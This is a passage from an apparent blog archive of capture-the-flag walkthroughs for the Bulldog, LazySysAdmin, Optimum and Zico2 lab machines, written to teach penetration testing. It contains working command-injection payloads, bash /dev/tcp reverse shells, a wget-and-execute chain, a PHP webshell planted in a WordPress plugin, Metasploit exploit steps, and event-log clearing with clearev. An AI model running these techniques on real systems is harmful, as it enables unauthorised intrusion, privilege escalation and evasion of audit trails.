the time. The client has not closed SSH yet, so let’s try there!\nssh nick@bulldog.ctf -p 23 - and his password ssh sarah@bulldog.ctf -p 23 - and her password No luck, but keeping it simple can yield great results.\nSo, we have two usernames to choose from. Nick works on the site’s backend, and Sarah runs the database. Backend might have access to the server, but database might have access to more credentials. Both are good choices, so let’s try both!\nMake sure you hit “Log Out” between attempts, or you’ll get stuck in cookie limbo. I logged in with both and got an identical not-very-promising screen for each user.\nHowever, armed with a logged-in session, we can access the web-shell! Go to /dev/shell and let’s see what we can do.\n4. Exploiting the Web-Shell # \u0026ldquo;All commands are run on the server itself\u0026rdquo; is SCREAMING command injection. We want to run commands here, so we have to figure out how to allow arbitrary commands through.\nWhat do we know?\nIt\u0026rsquo;s running Django, a python variant. It is likely to be using something analogous to \u0026ldquo;exec\u0026rdquo; in php, but there might be some “if” statement checking for the right commands. I wonder if we can trick this if statement by using one of the commands on the list, then once it passes that check, executing any command we want.\nLet’s try something like ;\nls; pwd; Oh no! The internet police are coming after me!\nLet’s try \u0026amp;\u0026amp;\nThis is promising, but pwd is on the list of approved commands. Let’s try something unapproved, like id, whoami or cd .\npwd \u0026amp;\u0026amp; id \u0026amp;\u0026amp; whoami \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; pwd Not only do we find out we can run commands, but we find out we can run sudo!\nLet’s see if we can use this to run a reverse shell. I have had mixed success with nc using the -e flag, so my go to shell command is:\nbash -i \u0026gt;\u0026amp; /dev/tcp/local.machine.ip.addr/PORTNUM 0\u0026gt;\u0026amp;1 Which we need to run after pwd or one of the other commands – after we have set up our listener of course.\nOn our local machine, we run:\nnc -lnvp 51000 - or any port number you like. And then on the Web-Shell, try running.\npwd \u0026amp;\u0026amp; bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.56.1/51000 0\u0026gt;\u0026amp;1 It didn’t like that, or give us a shell – but we didn’t get a “not allowed” error. That\u0026rsquo;s called progress! My go-to method to get around this is to write a script containing the more complicated or powerful commands I want to run, then to run a command to download and execute that script using simpler commands. It usually comes in these three parts:\nCreating a script containing a reverse shell spawning command, which is, in this case, bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.56.1/51000 0\u0026gt;\u0026amp;1 Hosting this script in a location the machine we want the reverse shell on can download from. In this case I am running a host-only network, so I will host it on my local machine. Downloading the script to a writable directory, then making it executable and running it. This last part usually uses wget-to donwload the script to a writable directory like /tmp and then running chmod +x script.sh and bash script.sh - so, we need do check if our user can run these commands.\nIn the webshell, we run\npwd \u0026amp;\u0026amp; which wget \u0026amp;\u0026amp; which chmod \u0026amp;\u0026amp; which bash \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; pwd \u0026amp;\u0026amp; ls -la This script will tell us if we can run wget, chmod and bash, while also double-checking that we can write to /tmp.\nAll good news! We can run all of those commands, AND can write to /tmp – this means we are ready to set up our http server and download the script!\nOn our host machine, we write our shell script to a .sh file. I did this with a simple:\necho \u0026quot;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.56.1/51000 0\u0026gt;\u0026amp;1\u0026quot; \u0026gt; script.sh Then, we start our SimpleHTTPServer in that same directory with\npython -m SimpleHTTPServer 51001 Our host machine is ready to serve up a freshly baked script. Make sure your listener is running, then we need to execute the change directory, download, make executable and run operation in the Web-Shell.\npwd \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; wget http://192.168.56.1:51001/script.sh \u0026amp;\u0026amp; chmod +x script.sh \u0026amp;\u0026amp; bash script.sh Make sure your ports are right! The host port is 5100 1 and the listener is 5100 0.\n5. Enumerating With A User Shell # We have some enumeration and privesc shell scripts handy, but before we go downloading and running them, we should try some simple things.\nSince this box is simulating a real world experience, we may see some common user missteps, such as leaving important notes and reminders laying around. Usually, these users would leave these things in a home folder – or maybe in emails.\nLet’s see what we can see in the /home directory.\ncd /home \u0026amp;\u0026amp; ls We can see here that Nick and Sarah don’t have home folders on this machine, there is just bulldogadmin and django. Luckily, we ARE django.\nls * shows us the non-hiddden. contents of the directories. Just a quick check to see if root_password_do_not_touch.txt is in any of these folders. Perhaps that file is hidden?\nls -la * .hiddenadmindirectory is not a standard, and we can look inside!\nls -a bulldogadmin/.hiddenadmindirectory A note? Could this be our AdminPassNoHackersPlz.txt file?\ncd bulldogadmin/.hiddenadmindirectory; cat note \u0026quot;\u0026hellip;the webserver is the… …one who needs to have root access\u0026hellip;\u0026quot; is all I needed to hear to get me interested. Right now, we are running as the webserver, and root access would be just lovely.\nThe other lines that got my attention were \u0026ldquo;Once I’m finished with it, a hacker wouldn’t even be able to reverse it,\u0026rdquo; and \u0026quot;…it’s still a prototype right now.\u0026quot;\nMaybe WE can reverse it.\n6. Reversing to Root # As of this writing, I am pretty new to reverse engineering. I do know some basics in gdb and peda, but before we try those, let’s see if it is a gift to be simple. I know that the customPermissionApp has been compiled, but there might be some useful human-readable lines in there. We can use the strings command here, and use less to go through it carefully. First, we will need a tty.\nwhich python We’ve got python, so we can run our python tty spawning command.\npython -c ‘import pty;pty.spawn(\u0026quot;/bin/bash\u0026quot;) Now we can use less\nstrings customPermissionApp | less Okay, let’s see if anything jumps out at us.\nThe first thing I noticed was \u0026ldquo;sudo su root\u0026rdquo; at the bottom. This command doesn’t just run a command as root, it tries to log in as root for a time.\n\u0026ldquo;sudo su\u0026rdquo; also requires a password, but the line \u0026ldquo;Usage: ./customPermissionApp \u0026rdquo; doesn’t appear to even ask for one. The note did mention that it only worked for the Django user, too. Could this mean that the password for the Django user is contained within this file?\nWe should read the whole file to try to find something, but let’s start with the section we are already looking at.\nHmm, this isn’t quite readable but I can make a guess out of it.\nSUPERultH imatePASH SWORDyouH CANTget You know, if you dropped those pesky H’s at the end, you would find SUPERultimatePASSWORDyouCANTget - which is yelling at us to be tried as a root password. So, let’s try it out.\nsudo su password: SUPERultimatePASSWORDyouCANTget\nI just love seeing that little #.\nWe own this box now – we are the top (bull)dog! From here we can just go to the /root directory and grab the flag.\ncd /root; ls; cat congrats.txt Lessons Learned # SSH is pretty safe, especially compared to web shells that execute commands directly on the server Input sanitization is hard. You DO need to use those more complicated hashes. If your website is called \u0026ldquo;bulldog\u0026rdquo; - don\u0026rsquo;t make that your password, ya dingus. Thanks to Nick Frichette for a fun box! Looking forward to the sequel!\n","date":"11 November 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/bulldog-vulnhub-nonintro/","section":"Archive","summary":"","title":"CTF Writeup: Bulldog on Vulnhub","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nA fun box from Vulnhub, written by Togie McDogie. You can find it here at https://www.vulnhub.com/entry/lazysysadmin-1,205/\nIntroduction # LazySysAdmin was a fun little box that reminds us to keep it simple. This write up assumes the reader has beginner knowledge of pentesting.\nIt also assumes the reader is using Kali, but all the tools are standard in distros like BlackArch as well. I ran it on my native Kali host machine using VirtualBox; on a host-only network.\nBefore beginning, I added its IP to my hosts file for convenience.\nHere is a very quick summary that is entirely composed of spoilers -\nIt doesn\u0026rsquo;t show my methodology or process. It will tell you how to get the root flag, but you won\u0026rsquo;t learn much. It\u0026rsquo;s also encrypted (weakly) - but if you can root the box using just the spoiler, you\u0026rsquo;ll know how to decode it.\n1. Initial Scans # As always, we start with nmap\nnmap -sV -T4 lazysysadmin.ctf Alright, we have a website, so let\u0026rsquo;s launch our regular HTTP battery. After that we will investigate SMB, MYSQL, and IRC - if we need to. If we figure out the credentials, we can SSH in as well.\nRun dirsearch, nikto, nmap w/ vuln scan, and manually browse the website. Run these scans in parallel.\nI like to run dirsearch twice - a quick scan without specifying a wordlist to find common things, then a deeper dive. Even my quick can uses a large number of extensions - I usually don\u0026rsquo;t run it recursively until I find an interesting starting point, or get stuck and think I need to keep digging.\ndirsearch -u lazysysadmin.ctf -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar nmap -A -O -T4 --script=vuln lazysysadmin.ctf nikto -h http://lazysysadmin.ctf In the browser, I took a peek at the page sources for anything interesting. However, won\u0026rsquo;t find much there.\nI like steganography (there is some in this guide) - so I read \u0026ldquo;The answer is within you\u0026rdquo; as \u0026ldquo;Check this image for stego.\u0026rdquo; Nothing came up with steghide, strings or stegsolve; so I checked my scan outputs.\nThe first thing I checked was robots.txt - something that the scanners might not be able to do for me. It didn\u0026rsquo;t contain anything too interesting\u0026hellip; unlike my nmap vulnscan, which dumped out a ton of useful info.\n2. Investigating the Website # /wordpress/ suggests we have a very fertile ground for planting an attack. Wordpress admin access = shell. /phpmyadmin/ suggests there is a database ready to plunder. /info.php gives us Kernel, hostname and OS information immediately. I dove right in with\nwpscan -u lazysysadmin.ctf/wordpress/ -e u,v,p and browsed it myself while it ran.\nwpscan found a bunch of potential vulnerabilities - but I like to start simply. The default username is in use, so maybe the default password will be as well. The only blog post is just my name is togie 50 times - so maybe thats the password?\nI tried admin:admin, admin:togie, admin:mynameistogie, and admin:password as well as a few capitalized versions. No hits. I think it might be time to look at the other services and see if there is anything there.\n3. Investigating the Other Services # SMB might hold some interesting information, and I know that it is running Linux, so I used enum4linux!\nenum4linux lazysysadmin.ctf Right off the bat, [+] Server lazysysadmin.ctf allows sessions using username '', password '' looks very promising.\nIt is shortly followed by //lazysysadmin.ctf/share$\tMapping: OK, Listing: OK\nWe connect with a simple\nsmbclient //lazysysadmin.ctf/share$ and just press enter when asked for the password.\nWhat looks interesting or new\u0026hellip; hmm. todolist.txt, deets.txt\u0026hellip; and ooh! A Wordpress directory! That might have our website setup in it!\ncd wordpress ls wp-config.php has given me passwords, or at least hashes, in the past. Let\u0026rsquo;s check it out.\nget wp-config.php exit less wp-config.php Why, hello there\u0026hellip;\nLet\u0026rsquo;s try this password at /phpmyadmin, and maybe we can drop a shell using a select ... into outfile!\nVisit /phpmyadmin and try logging in with Admin:TogieMYSQL12345^^ - and get db access!\n4. Plundering the SQL Database # Alright, let\u0026rsquo;s see what goodies we can find.\nwp_users looks appetizing, let\u0026rsquo;s view it.\nHmm\u0026hellip; maybe not. I tried logging out and back in with root:TogieMYSQL12345^^ - but to no avail.\nThere is the option to try manually inputting SQL commands, so let\u0026rsquo;s try that.\nFirst thing I want to see is if I can write a file - that could allow me to drop a shell script and gain access. I try\nselect 'hello' into outfile 'hello.txt' Hmm, this user has pretty limited privileges. Might be worth trying to view the db contents using SQL commands, however.\nselect * from wp_users from wordpress was forbidden, so I tried the more specific\nshow columns from wp_users from wordpress user_pass looks good to me, and some of the other fields aren’t bad either. I made sure the wordpress database was selected in phpmyadmin, then ran\nselect user_login, user_pass, user_nicename, user_email from wp_users Great, a hash! Maybe we can crack it. I wonder if it’s the same as the MySQL password…\nWait.\nWe can try just try logging in with that password to the wordpress site. Should have tried that first!\n5. Wordpress Admin Access # It’s a gift to be simple…\nLet’s go ahead and drop a php shell into one of the plugins.\nI’ve messed this process up before – so I always make a copy of the original text before trying any alterations. This also allows us to revert the plugin back to normal if we give ourselves another way in later.\nFrom /usr/share/webshells/php/ I grab what I like to call the \u0026ldquo;monkey shell\u0026rdquo; and make a copy in my pentest directory.\nI know the plugin code already includes \u003c?php and ?\u003e flags, so I chop those off and edit in the correct IP and port information.\nThen, we just paste it in at the end of our plugin code.\nNow we can start our listener with\nnc -lnvp PORTNUMBER and hit \u0026ldquo;Update File.\u0026rdquo;\u0026quot; My shell didn’t pop immediately, but after I clicked \u0026ldquo;Installed Plugins\u0026rdquo; again in order to make sure the plugin was active.\nWe\u0026rsquo;ve got a shell, and it is time to enumerate!\n6. Enumerating With www-data # Enumerating a system from the inside can sometimes feel like looking for a needle in a haystack. To be honest, if I lost a needle in a haystack, I’d just go look for another needle. But if I didn’t have another needle, I’d try to use a magnet. That can’t help us here, however.\nThe first thing I tried was looking in the /home folder for goodies left by users.\nNothing here – I usually go right for the bash history to see what the user had been working on, but there isn’t one here.\nMight as well upgrade my shell, too. Let’s see if we can run Python, then we might be able to run the python pty.\npython -V returns a version - the box runs python. Let\u0026rsquo;s get a TTY.\npython -c ‘import pty;pty.spawn(“/bin/bash”) After taking a quick peek at /etc/passwd to see all the usernames, I decided to see if I saw all there was to see on the website.\ncd /var/www/ ls cd html ls Oh look, the files from the SMB share are here too. Hmm, I got so excited by the wordpress directory that I didn’t even give these a thorough look.\ncat todolist.txt cat deets.txt Well, well, well. Togie did NOT seem to make it so users can’t see the web root – considering we could see into this directory via SMB. This suggests that togie did NOT remember to change the password either…\nCould this have been laying here the whole time?\nsu togie Use password 12345\n7. Call Me Togie! # This togie user seems to be the LazySysAdmin in question. I wonder if they can run anything as superuser.\nsudo -l Well, it looks like Togie can run some things as superuser. In fact, Togie can run every thing as superuser.\nsudo su 8. Did I say Togie? Sorry, my name is Oot. Richard Oot. # For presentation’s sake, I logged into SSH – but this is entirely optional and leads another entry in a log file. While doing the CTF myself, I continued to use the reverse shell.\nSeeing that little # brings a smile to my face.\ncd ~ ls cat proof.txt Lessons Learned # Try using passwords in multiple locations, password reuse is rampant. If you have access to a group of files, READ THEM. At least grep for \u0026ldquo;pass \\[word\\]\u0026rdquo; Don\u0026rsquo;t leave your web root in a publicly accessible SMB. Don\u0026rsquo;t leave your root password lying around! Or any other for that matter! Togie\u0026rsquo;s Questions: # What could you have done to speed up the enumeration process?\nI dove pretty deeply into HTTP first out of habit, instead of starting with a shallow wade-through of all possibilities. In this case, it paid to do a breadth-first enumeration process instead of a depth-first process.\nAre there any obvious things that you missed, which you shouldn\u0026rsquo;t have missed?\nI didn\u0026rsquo;t look at all the files I had access to on the SMB. I found one lead and then just chased it. Had I taken the time to look at all the files, I would have saved a lot of time.\nDid you learn anything interesting? and What have you added to your enumeration process to prevent you from wasting time?\nThe answer to both of these questions is related to breadth-vs-depth searching. I didn\u0026rsquo;t even realize that I was diving deeply instead of lightly browsing everything first.\nThanks Togie McDogie! # Good Luck on your next OSCP!\n","date":"8 November 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/lazysysadmin-vulnhub/","section":"Archive","summary":"","title":"CTF Writeup: LazySysAdmin on VulnHub","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nIntroduction # This was one of my first capture the flags, and the first HTB to go retired while I had a good enough grasp of it to do a write up. The steps are directed towards beginners, just like the box. Almost all the tools mentioned here can be found in a fresh Kali install - if they can\u0026rsquo;t I\u0026rsquo;ll mention it. The write up uses Kali Linux, but the tools used can be installed on/come with many pentesting Linux distributions like Blackarch.\nThe terminal emulator used here is Terminator. It can split windows in half, open tabs and more. You can get it with a simple apt-get install terminator\nA few of the steps in this guide don\u0026rsquo;t return hits - however, they are still important to include as part of the CTF process.\nIn order to do this CTF, you need to have an account on HackTheBox.eu, and be connected to the HTB VPN. HackTheBox requires you to \u0026ldquo;hack\u0026rdquo; your way into an invite code - and explicitly forbids anyone from publishing writeups for that process, sorry.\n1. Scan the IP address using nmap # Create ~/a_pentest folder to save outputs to. cd into this directory before beginning. You might want to have a CTFs folder to save your progress for posterity.\nWhenever you get an IP for a CTF box, nmap is the first thing to do, every time. The HTB IP for this box is 10.10.10.8\nnmap -sV -T4 10.10.10.8 | tee nmap_versionscan.txt\nThe -sV flag tells nmap to attempt to identify the versions of services it detects. The -T4 increases the number of threads running nmap so the process goes faster. | tee nmap_versionscan will output the results to the screen, but also to a file called nmap_versionscan so we can review the results without running another scan. nmap scan 2. Explore the Webpage in the Browser # The scan gives several important pieces of information:\nThe box is running an HTTP Server - that means we can visit a website in a browser, and use our HTTP tools. The HTTP Version: \u0026lsquo;HttpFileServer httpd 2.3\u0026rsquo; - we can look for vulnerabilities in this process. The box is running Windows - this will help us form our strategy. The first thing we should do is visit the web page and poke around.\nThe Website Add the \u0026ldquo;Login\u0026rdquo; area to a \u0026ldquo;might be useful\u0026rdquo; pile in our heads. It has the potential to be a point of attack.\nThe area marked \u0026ldquo;Home\u0026rdquo; has 0 folders, files and bytes. It\u0026rsquo;s unlikely there will be anything stored wherever that\u0026rsquo;s pointing to.\nAt the bottom of the page we see \u0026ldquo;Server Information HTTPFileServer 2.3\u0026rdquo; - this corroborates and confirms our nmap scan results.\nCorrelating pieces of information like this will help us build stable ground for us to build our strategy. This line is clickable. It will take us to the website run by the HTTPFileServer Company.\nBefore moving on, we can try to login with some common username and password pairs, as well as some contextual guesses.\nadmin:admin admin:password root:password root:root and admin:fileserver yielded no success.\nIf our other leads don\u0026rsquo;t pan out, we can return to this with a brute forcing tool.\n3. Use Other Tools To Explore The Website Further # The 3 main arrows in my website attack quiver are fimap (for spidering), nikto (for vulnerability analysis) and dirsearch (for page/directory discovery)\nSpidering with fimap # fimap is used to \u0026lsquo;spider\u0026rsquo; the web page - it follows every clickable thing on a page and returns a list of URLs, up to a certain depth. This happens much faster than if we tried to do it manually.\nfimap fimap -H -d 3 -u http://10.10.10.8 -w /tmp/fimap_output\nThe -H flag runs fimap in \u0026ldquo;URL Harvesting\u0026rdquo; (web spidering/crawling) mode. -d 3 sets the \u0026ldquo;depth\u0026rdquo; to 3 pages. This means it will explore urls 3 \u0026ldquo;clicks\u0026rdquo; deep. If the first page (A) has 2 clickable links, and those links lead to 2 links each (B) , and THOSE links lead to 2 links each (C), fimap will stop looking after the C links. -u http://10.10.10.8 sets our target URL -w /tmp/fimap_output will save the results to a file called fimap_output in the /tmp directory. If the crawl depth is set too high, we could end up clicking through half the internet! If you use a more complicated spider, such as the ones in OWASP ZAP and Burpsuite, you define a specific scope. This will limit the spider to links within the bounds of what we are trying to investigate.\nOur spidering didn\u0026rsquo;t tell us very much. It only finds one link, which doesn\u0026rsquo;t seem to even lead anywhere at all. So, we move on to the next tool.\nScanning for Vulnerabilities with nikto # nikto is a great vulnerability scanner for web applications. It will probe for weaknesses like open directories, setups vulnerable to exploit, and even find list filenames it finds interesting - such as robots.txt or /admin\nnikto start nikto -h http://10.10.10.8\nThe -h flag sets our target host IP) By default, nikto only returns \u0026ldquo;noteworthy\u0026rdquo; results to the console and can take some time to run all of its checks. While it runs, let\u0026rsquo;s start another tool while we wait for results.\nPage and Directory Bruteforcing # Not all pages on a website can be reached via clicking - sometimes you just need to know the URL. Instead of making guesses about the existence of pages and manually checking to see if they exist in the browser, there are specialized tools that do this automatically.\nKali includes dirb, and dirbuster, a GUI for dirb, which are effective tools. However, I like to use maurosoria\u0026rsquo;s dirsearch. This python3 script bruteforces with a bit more customization and speed than dirb. I cloned the repo into a directory called /opt/Web_Tools/dirsearch - but you can put it wherever you like.\nstarting dirsearch python3 (PATH)/dirsearch.py -u http://10.10.10.8 -e txt,html,php | tee dirsearch_results.txt\n-u just sets our URL -e txt,html,php tells dirsearch to look for .txt, .html and .php files at our host. The default dirsearch wordlist is pretty good, but you can specify another wordlists if you want to. We can start this and go back to check on nikto\nFinishing Up nikto # By this time, our nikto terminal has finished running.\nfinishing nikto What has it found?\nServer: HFS 2.3 - again confirms that we are running the HTTPFileServer v2.3 - triple confirmation. Everything else refers to vulnerabilities we aren\u0026rsquo;t particularly interested in. XSS and clickjacking are vulnerabilities that require user interaction, not something we will need to be concerned with on this CTF (and most other CTFs) Like fimap, nikto did not provide us with too much new information.\nFinishing dirsearch # Let\u0026rsquo;s see if dirsearch has turned up anything interesting.\nfinishing dirsearch A favicon is just a little icon that usually appears in a browser tab. dirsearch would have found things like a login.php or /admin or id_rsa page.\nOur manual, fimap, nikto, and dirsearch results don\u0026rsquo;t give us too much more to go on than our nmap scan.\nThis makes the information we do have, which has been confirmed multiple times by multiple scans, seem all the more important.\n4. Searching for Exploits and Vulnerabilities # Searchsploit Local Search # The only information we have to go is that the machine is running HTTPFileServer 2.3.\nDetailed information on what is running on a particular port is a good start. We have the full name of the service, as well as what version it is running. Let\u0026rsquo;s try and exploit it.\nsearchsploit is a tool included in Kali that queries the exploitdb database for your search terms. Many of the exploit scripts come included with it, and others run in Metasploit.\nsearchsploit HTTPFileServer\nsearchsploit HTTPFileServer Hmm, no luck there. nikto did refer to it as \u0026ldquo;HFS,\u0026rdquo; however\u0026hellip;\nsearchsploit HFS ? We can check our nmap results to verify that yes, that is our version number.\nHow nice that searchsploit has found so many exploits for that version.\nThere is a Metasploit module with Remote Code Execution, too. RCE leads to shells, and shells lead to root access.\nAlternative Search Method # Did you know you have access to the most powerful source of knowledge ever devised by human beings? If you ever have any thirst for knowledge - any question - anything you want to know about large and small, you can ask the Great Oracle of Modern Times, the Sage of Information\u0026hellip;\nYou should just Google it.\nSeriously. We live in the age of Bug Bounties and public disclosure. Unless you discover a 0day vulnerability, odds are a vulnerability can be found by searching online. Looking for a vulnerability in Windows Server? Search for it and soon you\u0026rsquo;ll be reading about EternalBlue and WannaCry. Trying to find vulnerabilities in a certain program? Try searching for the program name and \u0026ldquo;CVE.\u0026rdquo;\nWhat about in our case?\nGoogling HTTPFileServer There it is, Remote Code Execution.\nLet\u0026rsquo;s try another search, including \u0026ldquo;metasploit\u0026rdquo; this time.\nGoogling HTTPFileServer metasploit When I first attempted this box, Google helped me find the exploit module.\n5a. Understanding Metasploit # Metasploit is a very powerful framework for pentesting. Seeing \u0026ldquo;Meterpreter session started\u0026rdquo; is the real life equivalent to that moment on TV when the hacker says \u0026ldquo;I\u0026rsquo;m in!\u0026rdquo; and starts typing faster for some reason.\nThe framework can be a bit tricky to interact with the first time you use it, but the methodology usually follows the same path. Here is a ridiculous analogy.\nIn front of you is a locked door that you know can be opened from the other side. First, you use your advanced dual-channel optical scanners (eyeballs) to see that there is a small space (vulnerability) underneath the door. You can\u0026rsquo;t fit through, but luckily, you have your highly-trained utility hamster. This hamster is able to fit through the space under the door (exploit the vulnerability), and get to the other side. However, without any tools, the hamster won\u0026rsquo;t be able to let you in once it gets across the threshold. From your pocket, you pull out your hamster-sized grappling hook (payload) capable of grabbing the door handle on the other side and opening (gaining access to) the door.\nYou point out the space under the door to the hamster, hand him the grappling hook, and set him loose. He deftly scurries under the door, uses his little paws to swing the grappling hook up and over the door handle, and then uses all of his little might to pull down and swing open the door! Access granted, all thanks to our heroic hamster.\nThat hamster\u0026rsquo;s name? Metasploit.\nMetasploit Here is the process:\nIdentify a vulnerability Select the right metasploit Exploit module Set a Payload Provide the appropriate parameters Run the module 5b. Using msfconsole # In our case, our vulnerability is found in the HTTPFileSystem. searchsploit tells us an exploit module exists, and the default payload, the Meterpreter shell, will be very useful.\nAll of our exploits include the term Rejetto when referring to HttpFileServer.\nRun msfconsole to start up the metasploit console and see some nifty ASCII art. Then run search rejetto to find our exploit.\nopen msfconsole It will swiftly find a result.\nfound HFS exploit Our exploit module will be found at exploit/windows/http/rejetto_hfs_exec\nNow, we need to use this exploit:\nuse exploit/windows/http/rejetto_hfs_exec\nYour terminal will acknowledge the exploit has been loaded by turning red.\nIn order to see our parameters, we enter show options\nHFS Options If you look closely, you will see that some parameters are marked \u0026ldquo;yes\u0026rdquo; under the \u0026ldquo;Required\u0026rdquo; Column. All of these required parameters must be set, and sometimes you need to set certain parameters that aren\u0026rsquo;t even listed here.\nMost of the time, your Metasploit payload will require some sort of connection back to your computer. This means the localhost IP, called LHOST by Metasploit, needs to be set. If you do not set this manually, Metasploit will attempt to guess what this address is, and it frequently uses the wrong one.\nSince we are connected to the HackTheBox VPN, we want to use our HTB IP, not our local network address. I always forget my IP, but we can quickly run ifconfig in another terminal to see what our tun0 (yours might be tun1 or something else depending on your network setup) address is. All HTB CTF addresses are 10.10.10.xxx and your machine\u0026rsquo;s address will be 10.10.xx.xx\nThis exploit assumes we want to use the powerful Meterpreter reverse shell as our payload, and since Rejetto runs only on Windows, it will automatically use the Windows version of this payload.\nNow that we know what we are doing, we can set our parameters.\nset RHOST 10.10.10.8 - Tells metasploit Optimum\u0026rsquo;s Address. set LHOST 10.10.xx.xx - Set this to your HTB IP, this is for the meterpreter connection set SRVHOST 10.10.xx.xx - Also set this to your HTB IP, it is for hosting the exploit file. set LPORT 51000 - Set this value to your liking, but I like to use ports \u0026gt; 50,000 since they are dynamic. It is more unlikely that these ports will already be in use. Inital Rejetto Expl Parameters run - With all our parameters set, we can turn our hamster loose. Initial Meterpreter Session Started Meterpreter session 1 opened We\u0026rsquo;re in. The first thing we\u0026rsquo;ll want to do is gain more information about the system. Meterpreter has a set of commands based on Unix that work no matter what operating system it is running on. You can view a nice SANS cheat sheet of these commands here.\nsysinfo provides system information and help us get our bearings.\nsysinfo If we look closely, we can see that something\u0026rsquo;s not quite right here. Optimum\u0026rsquo;s architecture is x64. Our meterpreter version is set to x86, not x86_64! If we are going to proceed, we are going to need to change this.\nIn your Meterpreter shell, run background to go back to your msfconsole command line. Then run show options again to see what payload Metasploit assumed we wanted to use.\ndefault rejetto parameters This is almost correct. The payload is set to windows/meterpreter/reverse_tcp - which connects back over a TCP port from a Windows machine. However, this doesn\u0026rsquo;t specify an architecture, and defaults to x86, not x86_64. This is easy enough to fix, however. We just need to specify.\nset payload windows/x64/meterpreter/reverse_tcp\na new meterpreter Since we have the first Meterpreter session still running, we need to set the LPORT again.\nset LPORT 51001 run a new session (Sometimes this exploit will spawn you multiple sessions - just as a bonus! It has given me as many as 5!)\nWith the appropriate Meterpreter session we are able to move forward.\n6. The User Flag and Privilege Escalation # Right off the bat, we should capture the user flag. The HTB convention is to place user and root flags are kept in those users\u0026rsquo; home or desktop directories. The user flag will be in a folder belonging to one of the non-root users, while the root flag is in a folder owned by a root or Administrator account.\ngetuid shows what user we are running as . kostas is likely a non-admin user. pwd Tells us our current working directory - the User\u0026rsquo;s desktop, how convenient. ls Shows the files in this directory - user.txt.txt looks promising. cat user.txt.txt will output the contents of the user flag file to the screen. Copy down the flag hash and submit it on HackTheBox!\nFlag Captured! What should we do next? Any suggestions? # User flag in hand, we need to begin gathering more information about the system. Eventually, we will find something we can use in our efforts to gain admin access. This process can be trial and error, and seems to take time to get good at it. Luckily, we have tools.\nOne of the advantages of the Meterpreter shell is scalability. Once you have in running on a machine, privilege escalation is made easier.\npost modules are used post-exploitation, after you already have a Meterpreter shell running on a machine. The local_exploit_suggester post module searches for vulnerabilities and automatically suggest exploits that may be appropriate for what it finds.\nWe\u0026rsquo;ll need to use this module, and point it at our current Meterpreter session.\nRun these commands:\nuse post/multi/recon/local_exploit_suggester set SESSION 2 to point the exploit at our x64 meterpreter session Optionally, run set SHOWDESCRIPTION true if you want to have a detailed explanation of any suggested exploits. run Local Exploit Suggester It ran, but it didn\u0026rsquo;t come up with any suggestions. Let\u0026rsquo;s see if we can find anything ourselves.\nsessions 2 returns us to our x64 Meterpreter session sysinfo provides information to start searching for exploits sysinfo tells us our operating system is Windows 2012 R2 and reminds us we are using x86_64 architecture.\nWe have a technical question - how can we find an answer? # We must beseech the oracle for guidance!\nAsking the Oracle for guidance The first hit gives us a nice MS vulnerability number, MS16-032 The \u0026ldquo;16\u0026rdquo; means it is from 2016, meaning it takes advantage of a relatively new vulnerability - that\u0026rsquo;s a good sign. Searching for this in Metasploit and see if we have any modules.\nmsfconsole ms16-032 search Jackpot!\n7. Trying Out the Privesc Module and the System Flag # oad it up and give it a whirl.\nuse exploit/windows/local/ms16_032_secondary_logon_handle_privesc show options to see what parameters we need to set ms16-032 default parameters See the Targets Section? We need to specify our architecture again. Make sure our payload has the right architecture too. Then, set the other parameters.\nshow targets set TARGET 1 to specify x64 set SESSION 2 Note that this command was run before screenshot below was taken, it is REQUIRED set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.10.xx.xx set LPORT 51003 run Session 4 Started! It worked! We should first see who/where we are, and then see if we can capture the flag.\ngetuid - should output NT AUTHORITY\\SYSTEM. This is Windows-Speak for \u0026ldquo;All-Powerful Admin Root Master\u0026rdquo; pwd - see where we are and how we can navigate to the admin\u0026rsquo;s desktop. cd /Users/ ls - from here we can see all the User directories, including Administrator. cd Administrator/Desktop - we know this is where our flag can be found. ls cat root.txt - system flag captured! System flag captured! 8. Cleanup # Since this is a CTF, cleanup isn\u0026rsquo;t mandatory. However, we want to develop good habits and operational security practice. Meterpreter has a clearev command that can be used to cover our tracks - let\u0026rsquo;s run it and be out of here.\nclearev exit -y - the -y flag answers \u0026ldquo;Kill the session?\u0026rdquo; in advance. Cleaning Up exit -y again will kill the other sessions and exit msfconsole. Thanks for reading! # ","date":"30 October 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/optimum-htb/","section":"Archive","summary":"","title":"CTF Writeup: Optimum on HackTheBox","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nGet the VM here: https://www.vulnhub.com/entry/zico2-1,210/\nIntroduction # My friends and I like to solve CTFs on our own, then teach each other how we solved it. This way, we get experience both teaching and learning, and you always understand material you need to explain to someone else better than if you kept it to yourself.\nZico\u0026rsquo;s author rates the box as \u0026ldquo;intermediate,\u0026rdquo; but I\u0026rsquo;d call it \u0026ldquo;beginner plus.\u0026rdquo; The ideas needed to root the box are not complicated, but you need to have a bit of prior knowledge to know that you need to implement them.\nShall we begin?\n1. Initial Scanning # Since we are dealing with a VulnHub VM, we need to set it up on our HOST ONLY network. This box is intentionally vulnerable, why hook it up to your real network?\nDepending on how you\u0026rsquo;ve set up your host-only network, you may need to use nmap to determine the machine\u0026rsquo;s IP.\nnmap -sn 192.168.56.0/24\nOnce you\u0026rsquo;ve found the box, it\u0026rsquo;s time to give it a real portscan. I like to use my benmap script, which runs a few scans and generates a working directory for the CTF. You can check it out on Github.\nThe nmap -F scan found some potential avenues of attack:\nSSH on port 22 HTTP on port 80 rpcbind on port 111 HTTP is my favorite place to start on CTF\u0026rsquo;s, so we hit it with the triple threat: nikto, dirsearch and fimap.\nnikto -h 192.168.56.101 -o nikto_result.txt\nNikto tells us that Apache is a bit obsolete, but nothing else particularly interesting. Throw that on our \u0026ldquo;places to dig\u0026rdquo; list and let\u0026rsquo;s use dirsearch.\ndirsearch -u 